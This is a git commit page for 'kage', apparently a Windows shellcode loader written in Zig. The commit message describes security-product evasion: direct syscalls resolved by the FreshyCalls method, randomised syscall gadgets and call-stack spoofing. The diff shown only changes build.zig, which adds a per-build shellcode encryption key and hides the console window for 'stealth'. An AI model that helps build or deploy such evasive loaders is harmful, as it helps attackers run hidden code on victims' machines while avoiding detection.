kage: freshycalls + rand gadgets + stack spoof
- freshycalls sorted export rva table instead of hells gate for SSNs - 64 syscall;ret gadgets in a pool, picks random via xorshift64 - hells_gate.s pushes fake ntdll return before syscall now - got rid of the 5 wrapper functions, just one syscall_dispatch - deleted win32.zig, using std.os.windows. named structs for peb - asm volatile and enum fixes so this compiles on zig 0.16 - build.zig: added .abi = .gnu, .Windows subsystem
This commit is contained in:
@@ -4,31 +4,38 @@ pub fn build(b: *std.Build) void {
|
||||
const target = b.standardTargetOptions(.{ .default_target = .{
|
||||
.cpu_arch = .x86_64,
|
||||
.os_tag = .windows,
|
||||
.abi = .gnu,
|
||||
} });
|
||||
const optimize = b.standardOptimizeOption(.{});
|
||||
|
||||
var key: [16]u8 = undefined;
|
||||
var rng = std.Random.DefaultPrng.init(@intFromPtr(b));
|
||||
rng.random().bytes(&key);
|
||||
const key_u128 = std.mem.readInt(u128, &key, .little);
|
||||
|
||||
const options = b.addOptions();
|
||||
options.addOption(u128, "shellcode_key", key_u128);
|
||||
|
||||
const module = b.createModule(.{
|
||||
.root_source_file = b.path("src/main.zig"),
|
||||
.target = target,
|
||||
.optimize = optimize,
|
||||
});
|
||||
module.addOptions("build_options", options);
|
||||
module.addAssemblyFile(b.path("src/hells_gate.s"));
|
||||
|
||||
const exe = b.addExecutable(.{
|
||||
.name = "kage",
|
||||
.root_module = module,
|
||||
});
|
||||
|
||||
module.addAssemblyFile(b.path("src/hells_gate.s"));
|
||||
// .Windows = no console window (stealth). Change to .Console for debug output.
|
||||
exe.subsystem = .Windows;
|
||||
|
||||
b.installArtifact(exe);
|
||||
|
||||
const run_cmd = b.addRunArtifact(exe);
|
||||
run_cmd.step.dependOn(b.getInstallStep());
|
||||
|
||||
if (b.args) |args| {
|
||||
run_cmd.addArgs(args);
|
||||
}
|
||||
if (b.args) |args| run_cmd.addArgs(args);
|
||||
|
||||
const run_step = b.step("run", "Run the loader");
|
||||
run_step.dependOn(&run_cmd.step);
|
||||
|
||||
Reference in New Issue
Block a user